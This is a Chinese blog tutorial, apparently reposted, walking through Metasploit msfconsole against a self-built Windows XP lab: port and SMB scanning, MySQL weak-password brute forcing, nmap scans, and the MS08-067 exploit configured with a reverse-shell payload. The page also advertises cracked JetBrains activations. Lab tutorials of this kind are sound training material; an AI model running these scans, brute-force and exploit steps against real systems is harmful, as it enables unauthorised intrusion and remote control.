msfconsole攻击工具_服务器console接口是干嘛的

全栈程序员-站长 • 2022年9月7日上午11:16 • 未分类 • 阅读 0

msfconsole攻击工具_服务器console接口是干嘛的?Msfconsole工具概括：???Msfconsole简称（msf）是一款常用的渗透测试工具，包含了常见的漏洞利用模块和生成各种木马，方便于安全测试人员的使用.（1）进行端口扫描.（2）进行服务的扫描.（3）扫描3306（Mysql）端口的弱口令.（4）在msf模块里也可以使用nmap进行扫描.（5）扫描了服务器是用WinXP，然后对服务器进行渗透测试.

大家好，又见面了，我是你们的朋友全栈君。如果您正在找激活码,请点击查看最新教程,关注关注公众号 “全栈程序员社区” 获取激活教程,可能之前旧版本教程已经失效.最新Idea2022.1教程亲测有效,一键激活。

Jetbrains全系列IDE使用 1年只要46元售后保障童叟无欺

?生活总会难过?，?但好运也会如期而至?

????????????????????????

?目录：

?Msfconsole工具概括：

?免责声明：

?Msfconsole的使用：

?打开Msfconsole工具：

?第一步：进行端口扫描.

?第二步：进行服务的扫描.

?第三步：扫描3306（Mysql）端口的弱口令

?第四步：在msf模块里也可以使用nmap进行扫描.

?第五步：扫描了服务器是用Win XP，然后对服务器进行渗透测试.

?渗透测试失败的原因：

?Msfconsole工具概括：

???Msfconsole简称（msf）是一款常用的渗透测试工具，包含了常见的漏洞利用模块和生成各种木马，方便于安全测试人员的使用.

?免责声明：

严禁利用本文章中所提到的虚拟机和技术进行非法攻击，否则后果自负，上传者不承担任何责任。

?测试机：

kali2021 链接：https://pan.baidu.com/s/1ZKvP-CFYcmhFw3ol5ul4bg
提取码：tian

?靶场：

本地自己搭建的 Pikachu（皮卡丘）靶场：安装在win XP（IP地址：192.168.1.103）

Pikachu（皮卡丘）靶场搭建链接：Web安全 Pikachu（皮卡丘）靶场搭建._半个西瓜.的博客-CSDN博客

?Msfconsole的使用：

?打开Msfconsole工具：

msfconsole

msfconsole攻击工具_服务器console接口是干嘛的

?第一步：进行端口扫描.

?（1）查看端口扫描的模块：

search portscan

msfconsole攻击工具_服务器console接口是干嘛的

?（2）使用端口扫描模块：

use auxiliary/scanner/portscan/tcp

msfconsole攻击工具_服务器console接口是干嘛的

?（3）查看模块信息（模块里的yes都要填）：

show options

msfconsole攻击工具_服务器console接口是干嘛的

?（4）设置目标IP进行扫描：

set rhosts （目标IP地址）

msfconsole攻击工具_服务器console接口是干嘛的

?（5）设置线程为100：

set threads 100

msfconsole攻击工具_服务器console接口是干嘛的

?（6）使用（执行）：run 或者 exploit

run

msfconsole攻击工具_服务器console接口是干嘛的

?（7）退出到msf ：

back

msfconsole攻击工具_服务器console接口是干嘛的

?第二步：进行服务的扫描.

?（1）查看smb_version服务模块：

search smb_version

msfconsole攻击工具_服务器console接口是干嘛的

?（2）使用服务模块：

use auxiliary/scanner/smb/smb_version

msfconsole攻击工具_服务器console接口是干嘛的

?（3）查看模块信息（模块里的yes都要填）：

show options

msfconsole攻击工具_服务器console接口是干嘛的

?（4）设置目标IP进行扫描：

set rhosts （目标IP地址）

msfconsole攻击工具_服务器console接口是干嘛的

?（5）设置线程为10：

set threads 10

msfconsole攻击工具_服务器console接口是干嘛的

?（6）使用（执行）：run或者exploit

run

msfconsole攻击工具_服务器console接口是干嘛的

?（7）退出到msf ：

back

msfconsole攻击工具_服务器console接口是干嘛的

?第三步：扫描3306（Mysql）端口的弱口令

?（1）查看扫描3306（Mysql）端口的弱口令模板信息：

search mysql_login

msfconsole攻击工具_服务器console接口是干嘛的

?（2）使用扫描3306（Mysql）端口的弱口令模块：

use auxiliary/scanner/mysql/mysql_login

msfconsole攻击工具_服务器console接口是干嘛的

?（3）查看模块信息（模块里的yes都要填）：

show options

msfconsole攻击工具_服务器console接口是干嘛的

?（4）设置目标IP进行扫描：

set rhosts （目标IP地址）

msfconsole攻击工具_服务器console接口是干嘛的

?（5）设置线程为10：

set threads 10

msfconsole攻击工具_服务器console接口是干嘛的

?（6）使用（执行）：run或者exploit

run

msfconsole攻击工具_服务器console接口是干嘛的

?（7）退出到msf ：

back

msfconsole攻击工具_服务器console接口是干嘛的

?第四步：在msf模块里也可以使用nmap进行扫描.

?（1）主机发现：

nmap -sn 地址/24

msfconsole攻击工具_服务器console接口是干嘛的

?（2）端口扫描：

nmap -sS 地址

msfconsole攻击工具_服务器console接口是干嘛的

?（3）系统扫描：

nmap -O 地址

msfconsole攻击工具_服务器console接口是干嘛的

?（4）版本扫描：

nmap -sV 地址

msfconsole攻击工具_服务器console接口是干嘛的

?（5）综合扫描：

nmap -A 地址

msfconsole攻击工具_服务器console接口是干嘛的

?第五步：扫描了服务器是用Win XP，然后对服务器进行渗透测试.

?（1）启动 postgresql 数据库：

systemctl start postgresql.service

msfconsole攻击工具_服务器console接口是干嘛的

?（2）设置为开机自启：

systemctl enable postgresql

msfconsole攻击工具_服务器console接口是干嘛的

?（3）启动 Metasploit

msfconsole

msfconsole攻击工具_服务器console接口是干嘛的

?（4）搜索Win XP漏洞对应的模块.

search ms08_067

msfconsole攻击工具_服务器console接口是干嘛的

?（5）使用Win XP漏洞扫描模块.

use exploit/windows/smb/ms08_067_netapi

msfconsole攻击工具_服务器console接口是干嘛的

?（6）设置攻击载荷

set payload generic/shell_reverse_tcp

msfconsole攻击工具_服务器console接口是干嘛的

?（7）查看模块信息（模块里的yes都要填）.

show options

msfconsole攻击工具_服务器console接口是干嘛的

?（8）查看渗透攻击模块的攻击平台，找到操作系统平台版本

show targets

msfconsole攻击工具_服务器console接口是干嘛的

?（9）设置操作系统（target）.

set target 34

msfconsole攻击工具_服务器console接口是干嘛的

?（10）设置目标IP.

set rhosts （目标IP地址）

msfconsole攻击工具_服务器console接口是干嘛的

?（11）设置本地IP

set LHOST 本地IP

msfconsole攻击工具_服务器console接口是干嘛的

?（12）设置端口：

set LPORT 4444

msfconsole攻击工具_服务器console接口是干嘛的

?（13）使用（执行）：run或者exploit

msfconsole攻击工具_服务器console接口是干嘛的

?（14）渗透测试成功.

?渗透测试失败的原因：

?（1）靶机开启了防火墙.

?（2）两台主机不能互联.（用 ping IP地址）

参考链接：使用MSF 利用 ms08_067 对 XP 进行渗透_丰梓林的博客-CSDN博客

版权声明：本文内容由互联网用户自发贡献，该文观点仅代表作者本人。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容，请联系我们举报，一经查实，本站将立刻删除。

发布者：全栈程序员-站长，转载请注明出处：https://javaforall.net/196341.html原文链接：https://javaforall.net

赞 (0)

全栈程序员-站长

0 0

股票实时数据接口api_股票开放接口api

股票实时数据接口api_股票开放接口api免费股票数据API接口提供沪深、香港、美国股市信息。1.沪深股市2.香港股市3.美国股市4.香港股市列表5.美国股市列表6.深圳股市列表7.沪股列表API文档：https://www.juhe.cn/docs/api/id/21，申请获取APPKEY即可调用。示例代码PHP股票数据示例Python股票数据接口调用示例C#股票…

全栈程序员-站长
2022年9月2日
3
串口服务器调试助手使用教程,comassistant串口调试助手使用说明.pdf

串口服务器调试助手使用教程,comassistant串口调试助手使用说明.pdf作者：温子祺wenziqi@wenziqi@单片机多功能调试助手简介单片机多功能调试助手简介单单片片机机多多功功能能调调试试助助手手简简介介1111简介图1单片机多功能调试助手单片机多功能调试助手一款集串口/USB/网络调试、进制转换、字模与数码管字型码制作、常用校验值计算、UNICODE码转换、位图输出C文件等众多功能于一身的综合型调试软件，最值得庆幸的是该软件会一直保持更新，并支持在…

全栈程序员-站长
2022年6月12日
30
Delphi中QuotedStr()

Delphi中QuotedStr()1.定义给字符串两边加单引号并返回.声明:functionQuotedStr(constS:string):string;用函数QuotedStr把字符串S转换成为用引号括起来的字符串。单引号”’”将被插入到字符串s的最前和最后。2.范例特别可以应用在delphi的中的SQL语句，避免漏写的情况。lsstr:=…+QuotedStr（‘STR’）+…lsstr:=…+’WHERE‘’‘+‘abc‘+’’’…’QTmpR2.Close;QT

全栈程序员-站长
2022年10月18日
0
vue长列表渲染_vue 二维数组渲染

vue长列表渲染_vue 二维数组渲染循环在模板中可以用v-for指令来循环数组，对象等。循环数组我们可以用v-for指令基于一个数组来渲染一个列表。v-for指令需要使用iteminitems形式的特殊语法，其中it

全栈程序员-站长
2022年7月30日
3
Java5的for/in循环使用[通俗易懂]

Java5的for/in循环使用

全栈程序员-站长
2022年3月12日
176
遍历map的几种方法?_hashmap如何遍历

遍历map的几种方法?_hashmap如何遍历#先往map加入几个数据Map<Integer,String>map=newHashMap<>();map.put(1,”美好的周一”);map.put(2,”美好的周二”);map.put(3,”美好的周三”);方法一：普通的foreach循环，使用keySet()方法，遍历keyfor(Integerkey:map.keySet()){System.out.println(“key:”+key+

全栈程序员-站长
2022年9月21日
1

发表回复

关注全栈程序员社区公众号